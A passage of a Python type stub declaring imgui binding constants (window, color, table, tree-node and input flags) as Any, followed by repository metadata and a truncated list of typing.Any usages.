Any\nSTYLE_SCROLLBAR_SIZE: Any\nSTYLE_SCROLLBAR_ROUNDING: Any\nSTYLE_GRAB_MIN_SIZE: Any\nSTYLE_GRAB_ROUNDING: Any\nSTYLE_TAB_ROUNDING: Any\nSTYLE_BUTTON_TEXT_ALIGN: Any\nSTYLE_SELECTABLE_TEXT_ALIGN: Any\nBUTTON_NONE: Any\nBUTTON_MOUSE_BUTTON_LEFT: Any\nBUTTON_MOUSE_BUTTON_RIGHT: Any\nBUTTON_MOUSE_BUTTON_MIDDLE: Any\nWINDOW_NONE: Any\nWINDOW_NO_TITLE_BAR: Any\nWINDOW_NO_RESIZE: Any\nWINDOW_NO_MOVE: Any\nWINDOW_NO_SCROLLBAR: Any\nWINDOW_NO_SCROLL_WITH_MOUSE: Any\nWINDOW_NO_COLLAPSE: Any\nWINDOW_ALWAYS_AUTO_RESIZE: Any\nWINDOW_NO_BACKGROUND: Any\nWINDOW_NO_SAVED_SETTINGS: Any\nWINDOW_NO_MOUSE_INPUTS: Any\nWINDOW_MENU_BAR: Any\nWINDOW_HORIZONTAL_SCROLLING_BAR: Any\nWINDOW_NO_FOCUS_ON_APPEARING: Any\nWINDOW_NO_BRING_TO_FRONT_ON_FOCUS: Any\nWINDOW_ALWAYS_VERTICAL_SCROLLBAR: Any\nWINDOW_ALWAYS_HORIZONTAL_SCROLLBAR: Any\nWINDOW_ALWAYS_USE_WINDOW_PADDING: Any\nWINDOW_NO_NAV_INPUTS: Any\nWINDOW_NO_NAV_FOCUS: Any\nWINDOW_UNSAVED_DOCUMENT: Any\nWINDOW_NO_NAV: Any\nWINDOW_NO_DECORATION: Any\nWINDOW_NO_INPUTS: Any\nCOLOR_EDIT_NONE: Any\nCOLOR_EDIT_NO_ALPHA: Any\nCOLOR_EDIT_NO_PICKER: Any\nCOLOR_EDIT_NO_OPTIONS: Any\nCOLOR_EDIT_NO_SMALL_PREVIEW: Any\nCOLOR_EDIT_NO_INPUTS: Any\nCOLOR_EDIT_NO_TOOLTIP: Any\nCOLOR_EDIT_NO_LABEL: Any\nCOLOR_EDIT_NO_SIDE_PREVIEW: Any\nCOLOR_EDIT_NO_DRAG_DROP: Any\nCOLOR_EDIT_NO_BORDER: Any\nCOLOR_EDIT_ALPHA_BAR: Any\nCOLOR_EDIT_ALPHA_PREVIEW: Any\nCOLOR_EDIT_ALPHA_PREVIEW_HALF: Any\nCOLOR_EDIT_HDR: Any\nCOLOR_EDIT_DISPLAY_RGB: Any\nCOLOR_EDIT_DISPLAY_HSV: Any\nCOLOR_EDIT_DISPLAY_HEX: Any\nCOLOR_EDIT_UINT8: Any\nCOLOR_EDIT_FLOAT: Any\nCOLOR_EDIT_PICKER_HUE_BAR: Any\nCOLOR_EDIT_PICKER_HUE_WHEEL: Any\nCOLOR_EDIT_INPUT_RGB: Any\nCOLOR_EDIT_INPUT_HSV: Any\nCOLOR_EDIT_DEFAULT_OPTIONS: Any\nTREE_NODE_NONE: Any\nTREE_NODE_SELECTED: Any\nTREE_NODE_FRAMED: Any\nTREE_NODE_ALLOW_ITEM_OVERLAP: Any\nTREE_NODE_NO_TREE_PUSH_ON_OPEN: Any\nTREE_NODE_NO_AUTO_OPEN_ON_LOG: Any\nTREE_NODE_DEFAULT_OPEN: Any\nTREE_NODE_OPEN_ON_DOUBLE_CLICK: Any\nTREE_NODE_OPEN_ON_ARROW: Any\nTREE_NODE_LEAF: Any\nTREE_NODE_BULLET: Any\nTREE_NODE_FRAME_PADDING: Any\nTREE_NODE_SPAN_AVAILABLE_WIDTH: Any\nTREE_NODE_SPAN_FULL_WIDTH: Any\nTREE_NODE_NAV_LEFT_JUPS_BACK_HERE: 
Any\nTREE_NODE_COLLAPSING_HEADER: Any\nPOPUP_NONE: Any\nPOPUP_MOUSE_BUTTON_LEFT: Any\nPOPUP_MOUSE_BUTTON_RIGHT: Any\nPOPUP_MOUSE_BUTTON_MIDDLE: Any\nPOPUP_MOUSE_BUTTON_MASK: Any\nPOPUP_MOUSE_BUTTON_DEFAULT: Any\nPOPUP_NO_OPEN_OVER_EXISTING_POPUP: Any\nPOPUP_NO_OPEN_OVER_ITEMS: Any\nPOPUP_ANY_POPUP_ID: Any\nPOPUP_ANY_POPUP_LEVEL: Any\nPOPUP_ANY_POPUP: Any\nCOLOR_TEXT: Any\nCOLOR_TEXT_DISABLED: Any\nCOLOR_WINDOW_BACKGROUND: Any\nCOLOR_CHILD_BACKGROUND: Any\nCOLOR_POPUP_BACKGROUND: Any\nCOLOR_BORDER: Any\nCOLOR_BORDER_SHADOW: Any\nCOLOR_FRAME_BACKGROUND: Any\nCOLOR_FRAME_BACKGROUND_HOVERED: Any\nCOLOR_FRAME_BACKGROUND_ACTIVE: Any\nCOLOR_TITLE_BACKGROUND: Any\nCOLOR_TITLE_BACKGROUND_ACTIVE: Any\nCOLOR_TITLE_BACKGROUND_COLLAPSED: Any\nCOLOR_MENUBAR_BACKGROUND: Any\nCOLOR_SCROLLBAR_BACKGROUND: Any\nCOLOR_SCROLLBAR_GRAB: Any\nCOLOR_SCROLLBAR_GRAB_HOVERED: Any\nCOLOR_SCROLLBAR_GRAB_ACTIVE: Any\nCOLOR_CHECK_MARK: Any\nCOLOR_SLIDER_GRAB: Any\nCOLOR_SLIDER_GRAB_ACTIVE: Any\nCOLOR_BUTTON: Any\nCOLOR_BUTTON_HOVERED: Any\nCOLOR_BUTTON_ACTIVE: Any\nCOLOR_HEADER: Any\nCOLOR_HEADER_HOVERED: Any\nCOLOR_HEADER_ACTIVE: Any\nCOLOR_SEPARATOR: Any\nCOLOR_SEPARATOR_HOVERED: Any\nCOLOR_SEPARATOR_ACTIVE: Any\nCOLOR_RESIZE_GRIP: Any\nCOLOR_RESIZE_GRIP_HOVERED: Any\nCOLOR_RESIZE_GRIP_ACTIVE: Any\nCOLOR_TAB = COLOR_TAB\nCOLOR_TAB_HOVERED = COLOR_TAB_HOVERED\nCOLOR_TAB_ACTIVE = COLOR_TAB_ACTIVE\nCOLOR_TAB_UNFOCUSED = COLOR_TAB_UNFOCUSED\nCOLOR_TAB_UNFOCUSED_ACTIVE = COLOR_TAB_UNFOCUSED_ACTIVE\nCOLOR_PLOT_LINES: Any\nCOLOR_PLOT_LINES_HOVERED: Any\nCOLOR_PLOT_HISTOGRAM: Any\nCOLOR_PLOT_HISTOGRAM_HOVERED: Any\nCOLOR_TABLE_HEADER_BACKGROUND: Any\nCOLOR_TABLE_BORDER_STRONG: Any\nCOLOR_TABLE_BORDER_LIGHT: Any\nCOLOR_TABLE_ROW_BACKGROUND: Any\nCOLOR_TABLE_ROW_BACKGROUND_ALT: Any\nCOLOR_TEXT_SELECTED_BACKGROUND: Any\nCOLOR_DRAG_DROP_TARGET: Any\nCOLOR_NAV_HIGHLIGHT: Any\nCOLOR_NAV_WINDOWING_HIGHLIGHT: Any\nCOLOR_NAV_WINDOWING_DIM_BACKGROUND: Any\nCOLOR_MODAL_WINDOW_DIM_BACKGROUND: Any\nCOLOR_COUNT: Any\nDATA_TYPE_S8: Any\nDATA_TYPE_U8: Any\nDATA_TYPE_S16: Any\nDATA_TYPE_U16: Any\nDATA_TYPE_S32: Any\nDATA_TYPE_U32: Any\nDATA_TYPE_S64: Any\nDATA_TYPE_U64: Any\nDATA_TYPE_FLOAT: Any\nDATA_TYPE_DOUBLE: Any\nSELECTABLE_NONE: Any\nSELECTABLE_DONT_CLOSE_POPUPS: Any\nSELECTABLE_SPAN_ALL_COLUMNS: Any\nSELECTABLE_ALLOW_DOUBLE_CLICK: Any\nSELECTABLE_DISABLED: Any\nSELECTABLE_ALLOW_ITEM_OVERLAP: Any\nCOMBO_NONE: Any\nCOMBO_POPUP_ALIGN_LEFT: Any\nCOMBO_HEIGHT_SMALL: Any\nCOMBO_HEIGHT_REGULAR: Any\nCOMBO_HEIGHT_LARGE: Any\nCOMBO_HEIGHT_LARGEST: Any\nCOMBO_NO_ARROW_BUTTON: Any\nCOMBO_NO_PREVIEW: Any\nCOMBO_HEIGHT_MASK: Any\nTAB_BAR_NONE: Any\nTAB_BAR_REORDERABLE: Any\nTAB_BAR_AUTO_SELECT_NEW_TABS: Any\nTAB_BAR_TAB_LIST_POPUP_BUTTON: Any\nTAB_BAR_NO_CLOSE_WITH_MIDDLE_MOUSE_BUTTON: Any\nTAB_BAR_NO_TAB_LIST_SCROLLING_BUTTONS: Any\nTAB_BAR_NO_TOOLTIP: Any\nTAB_BAR_FITTING_POLICY_RESIZE_DOWN: Any\nTAB_BAR_FITTING_POLICY_SCROLL: Any\nTAB_BAR_FITTING_POLICY_MASK: Any\nTAB_BAR_FITTING_POLICY_DEFAULT: Any\nTAB_ITEM_NONE: Any\nTAB_ITEM_UNSAVED_DOCUMENT: Any\nTAB_ITEM_SET_SELECTED: Any\nTAB_ITEM_NO_CLOSE_WITH_MIDDLE_MOUSE_BUTTON: Any\nTAB_ITEM_NO_PUSH_ID: Any\nTAB_ITEM_NO_TOOLTIP: Any\nTAB_ITEM_NO_REORDER: Any\nTAB_ITEM_LEADING: Any\nTAB_ITEM_TRAILING: Any\nTABLE_NONE: Any\nTABLE_RESIZABLE: Any\nTABLE_REORDERABLE: Any\nTABLE_HIDEABLE: Any\nTABLE_SORTABLE: Any\nTABLE_NO_SAVED_SETTINGS: Any\nTABLE_CONTEXT_MENU_IN_BODY: Any\nTABLE_ROW_BACKGROUND: Any\nTABLE_BORDERS_INNER_HORIZONTAL: Any\nTABLE_BORDERS_OUTER_HORIZONTAL: Any\nTABLE_BORDERS_INNER_VERTICAL: 
Any\nTABLE_BORDERS_OUTER_VERTICAL: Any\nTABLE_BORDERS_HORIZONTAL: Any\nTABLE_BORDERS_VERTICAL: Any\nTABLE_BORDERS_INNER: Any\nTABLE_BORDERS_OUTER: Any\nTABLE_BORDERS: Any\nTABLE_NO_BORDERS_IN_BODY: Any\nTABLE_NO_BORDERS_IN_BODY_UTIL_RESIZE: Any\nTABLE_SIZING_FIXED_FIT: Any\nTABLE_SIZING_FIXED_SAME: Any\nTABLE_SIZING_STRETCH_PROP: Any\nTABLE_SIZING_STRETCH_SAME: Any\nTABLE_NO_HOST_EXTEND_X: Any\nTABLE_NO_HOST_EXTEND_Y: Any\nTABLE_NO_KEEP_COLUMNS_VISIBLE: Any\nTABLE_PRECISE_WIDTHS: Any\nTABLE_NO_CLIP: Any\nTABLE_PAD_OUTER_X: Any\nTABLE_NO_PAD_OUTER_X: Any\nTABLE_NO_PAD_INNER_X: Any\nTABLE_SCROLL_X: Any\nTABLE_SCROLL_Y: Any\nTABLE_SORT_MULTI: Any\nTABLE_SORT_TRISTATE: Any\nTABLE_COLUMN_NONE: Any\nTABLE_COLUMN_DEFAULT_HIDE: Any\nTABLE_COLUMN_DEFAULT_SORT: Any\nTABLE_COLUMN_WIDTH_STRETCH: Any\nTABLE_COLUMN_WIDTH_FIXED: Any\nTABLE_COLUMN_NO_RESIZE: Any\nTABLE_COLUMN_NO_REORDER: Any\nTABLE_COLUMN_NO_HIDE: Any\nTABLE_COLUMN_NO_CLIP: Any\nTABLE_COLUMN_NO_SORT: Any\nTABLE_COLUMN_NO_SORT_ASCENDING: Any\nTABLE_COLUMN_NO_SORT_DESCENDING: Any\nTABLE_COLUMN_NO_HEADER_WIDTH: Any\nTABLE_COLUMN_PREFER_SORT_ASCENDING: Any\nTABLE_COLUMN_PREFER_SORT_DESCENDING: Any\nTABLE_COLUMN_INDENT_ENABLE: Any\nTABLE_COLUMN_INDENT_DISABLE: Any\nTABLE_COLUMN_IS_ENABLED: Any\nTABLE_COLUMN_IS_VISIBLE: Any\nTABLE_COLUMN_IS_SORTED: Any\nTABLE_COLUMN_IS_HOVERED: Any\nTABLE_ROW_NONE: Any\nTABLE_ROW_HEADERS: Any\nTABLE_BACKGROUND_TARGET_NONE: Any\nTABLE_BACKGROUND_TARGET_ROW_BG0: Any\nTABLE_BACKGROUND_TARGET_ROW_BG1: Any\nTABLE_BACKGROUND_TARGET_CELL_BG: Any\nFOCUS_NONE: Any\nFOCUS_CHILD_WINDOWS: Any\nFOCUS_ROOT_WINDOW: Any\nFOCUS_ANY_WINDOW: Any\nFOCUS_ROOT_AND_CHILD_WINDOWS: Any\nHOVERED_NONE: Any\nHOVERED_CHILD_WINDOWS: Any\nHOVERED_ROOT_WINDOW: Any\nHOVERED_ANY_WINDOW: Any\nHOVERED_ALLOW_WHEN_BLOCKED_BY_POPUP: Any\nHOVERED_ALLOW_WHEN_BLOCKED_BY_ACTIVE_ITEM: Any\nHOVERED_ALLOW_WHEN_OVERLAPPED: Any\nHOVERED_ALLOW_WHEN_DISABLED: Any\nHOVERED_RECT_ONLY: Any\nHOVERED_ROOT_AND_CHILD_WINDOWS: Any\nDRAG_DROP_NONE: Any\nDRAG_DROP_SOURCE_NO_PREVIEW_TOOLTIP: Any\nDRAG_DROP_SOURCE_NO_DISABLE_HOVER: Any\nDRAG_DROP_SOURCE_NO_HOLD_TO_OPEN_OTHERS: Any\nDRAG_DROP_SOURCE_ALLOW_NULL_ID: Any\nDRAG_DROP_SOURCE_EXTERN: Any\nDRAG_DROP_SOURCE_AUTO_EXPIRE_PAYLOAD: Any\nDRAG_DROP_ACCEPT_BEFORE_DELIVERY: Any\nDRAG_DROP_ACCEPT_NO_DRAW_DEFAULT_RECT: Any\nDRAG_DROP_ACCEPT_NO_PREVIEW_TOOLTIP: Any\nDRAG_DROP_ACCEPT_PEEK_ONLY: Any\nDIRECTION_NONE: Any\nDIRECTION_LEFT: Any\nDIRECTION_RIGHT: Any\nDIRECTION_UP: Any\nDIRECTION_DOWN: Any\nSORT_DIRECTION_NONE: Any\nSORT_DIRECTION_ASCENDING: Any\nSORT_DIRECTION_DESCENDING: Any\nMOUSE_CURSOR_NONE: Any\nMOUSE_CURSOR_ARROW: Any\nMOUSE_CURSOR_TEXT_INPUT: Any\nMOUSE_CURSOR_RESIZE_ALL: Any\nMOUSE_CURSOR_RESIZE_NS: Any\nMOUSE_CURSOR_RESIZE_EW: Any\nMOUSE_CURSOR_RESIZE_NESW: Any\nMOUSE_CURSOR_RESIZE_NWSE: Any\nMOUSE_CURSOR_HAND: Any\nMOUSE_CURSOR_NOT_ALLOWED: Any\nINPUT_TEXT_NONE: Any\nINPUT_TEXT_CHARS_DECIMAL: Any\nINPUT_TEXT_CHARS_HEXADECIMAL: Any\nINPUT_TEXT_CHARS_UPPERCASE: Any\nINPUT_TEXT_CHARS_NO_BLANK: Any\nINPUT_TEXT_AUTO_SELECT_ALL: Any\nINPUT_TEXT_ENTER_RETURNS_TRUE: Any\nINPUT_TEXT_CALLBACK_COMPLETION: Any\nINPUT_TEXT_CALLBACK_HISTORY: Any\nINPUT_TEXT_CALLBACK_ALWAYS: Any\nINPUT_TEXT_CALLBACK_CHAR_FILTER: Any\nINPUT_TEXT_ALLOW_TAB_INPUT: Any\nINPUT_TEXT_CTRL_ENTER_FOR_NEW_LINE: Any\nINPUT_TEXT_NO_HORIZONTAL_SCROLL: Any\nINPUT_TEXT_ALWAYS_OVERWRITE: Any\nINPUT_TEXT_ALWAYS_INSERT_MODE: Any\nINPUT_TEXT_READ_ONLY: Any\nINPUT_TEXT_PASSWORD: Any\nINPUT_TEXT_NO_UNDO_REDO: Any\nINPUT_TEXT_CHARS_SCIENTIFIC: 
Any\nINPUT_TEXT_CALLBACK_RESIZE: Any\nINPUT_TEXT_CALLBACK_EDIT: Any\nDRAW_CORNER_NONE: Any\nDRAW_CORNER_TOP_LEFT: Any\nDRAW_CORNER_TOP_RIGHT: Any\nDRAW_CORNER_BOTTOM_LEFT: Any\nDRAW_CORNER_BOTTOM_RIGHT: Any\nDRAW_CORNER_TOP: Any\nDRAW_CORNER_BOTTOM: Any\nDRAW_CORNER_LEFT: Any\nDRAW_CORNER_RIGHT: Any\nDRAW_CORNER_ALL: Any\nDRAW_NONE: Any\nDRAW_CLOSED: Any\nDRAW_ROUND_CORNERS_TOP_LEFT: Any\nDRAW_ROUND_CORNERS_TOP_RIGHT: Any\nDRAW_ROUND_CORNERS_BOTTOM_LEFT: Any\nDRAW_ROUND_CORNERS_BOTTOM_RIGHT: Any\nDRAW_ROUND_CORNERS_NONE: Any\nDRAW_ROUND_CORNERS_TOP: Any\nDRAW_ROUND_CORNERS_BOTTOM: Any\nDRAW_ROUND_CORNERS_LEFT: Any\nDRAW_ROUND_CORNERS_RIGHT: Any\nDRAW_ROUND_CORNERS_ALL: Any\nDRAW_LIST_NONE: Any\nDRAW_LIST_ANTI_ALIASED_LINES: Any\nDRAW_LIST_ANTI_ALIASED_LINES_USE_TEX: Any\nDRAW_LIST_ANTI_ALIASED_FILL: Any\nDRAW_LIST_ALLOW_VTX_OFFSET: Any\nFONT_ATLAS_NONE: Any\nFONT_ATLAS_NO_POWER_OF_TWO_HEIGHT: Any\nFONT_ATLAS_NO_MOUSE_CURSOR: Any\nFONT_ATLAS_NO_BAKED_LINES: Any\nCONFIG_NONE: Any\nCONFIG_NAV_ENABLE_KEYBOARD: Any\nCONFIG_NAV_ENABLE_GAMEPAD: Any\nCONFIG_NAV_ENABLE_SET_MOUSE_POS: Any\nCONFIG_NAV_NO_CAPTURE_KEYBOARD: Any\nCONFIG_NO_MOUSE: Any\nCONFIG_NO_MOUSE_CURSOR_CHANGE: Any\nCONFIG_IS_RGB: Any\nCONFIG_IS_TOUCH_SCREEN: Any\nBACKEND_NONE: Any\nBACKEND_HAS_GAMEPAD: Any\nBACKEND_HAS_MOUSE_CURSORS: Any\nBACKEND_HAS_SET_MOUSE_POS: Any\nBACKEND_RENDERER_HAS_VTX_OFFSET: Any\nMOUSE_BUTTON_LEFT: Any\nMOUSE_BUTTON_RIGHT: Any\nMOUSE_BUTTON_MIDDLE: Any\nVIEWPORT_FLAGS_NONE: Any\nVIEWPORT_FLAGS_IS_PLATFORM_WINDOW: Any\nVIEWPORT_FLAGS_IS_PLATFORM_MONITOR: Any\nVIEWPORT_FLAGS_OWNED_BY_APP: Any\n", "repo_name": "juso40/bl2sdk_Mods", "sub_path": "blimgui/dist/out/imgui/__init__.pyi", "file_name": "__init__.pyi", "file_ext": "pyi", "file_size_in_byte": 12124, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 35, "dataset": "github-code", "pt": "61", "api": [{"api_name": "typing.Any", "line_number": 6, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 7, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 8, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 9, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 10, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 11, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 12, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 13, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 14, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 15, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 16, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 17, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 18, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 19, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 20, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 21, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 22, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 23, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 24, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 25, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 26, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 27, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 28, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 29, "usage_type": "name"}, {"api_name": 
"typing.Any", "line_number": 30, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 31, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 32, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 33, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 34, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 35, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 36, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 37, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 38, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 39, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 40, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 41, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 42, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 43, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 44, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 45, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 46, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 47, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 48, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 49, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 50, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 51, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 52, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 53, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 54, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 55, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 56, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 57, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 58, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 59, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 60, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 61, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 62, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 63, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 64, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 65, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 66, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 67, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 68, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 69, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 70, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 71, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 72, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 73, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 74, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 75, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 76, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 77, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 78, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 79, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 80, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 81, 
"usage_type": "name"}, {"api_name": "typing.Any", "line_number": 82, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 83, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 84, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 85, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 86, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 87, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 88, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 89, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 90, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 91, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 92, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 93, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 94, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 95, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 96, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 97, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 98, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 99, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 100, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 101, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 102, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 103, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 104, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 105, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 106, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 107, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 108, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 109, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 110, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 111, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 112, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 113, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 114, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 115, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 116, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 117, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 118, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 119, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 120, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 121, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 122, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 123, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 124, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 125, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 126, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 127, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 128, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 129, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 130, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 131, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 132, 
"usage_type": "name"}, {"api_name": "typing.Any", "line_number": 133, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 134, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 135, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 136, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 137, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 138, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 139, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 140, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 141, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 142, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 143, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 144, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 145, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 146, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 147, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 148, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 149, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 150, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 151, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 152, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 153, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 154, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 155, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 156, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 157, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 158, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 159, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 160, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 161, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 162, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 163, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 164, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 165, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 166, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 167, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 168, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 169, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 170, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 171, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 172, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 173, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 174, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 175, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 176, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 177, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 178, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 179, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 180, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 181, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 182, "usage_type": "name"}, {"api_name": "typing.Any", 
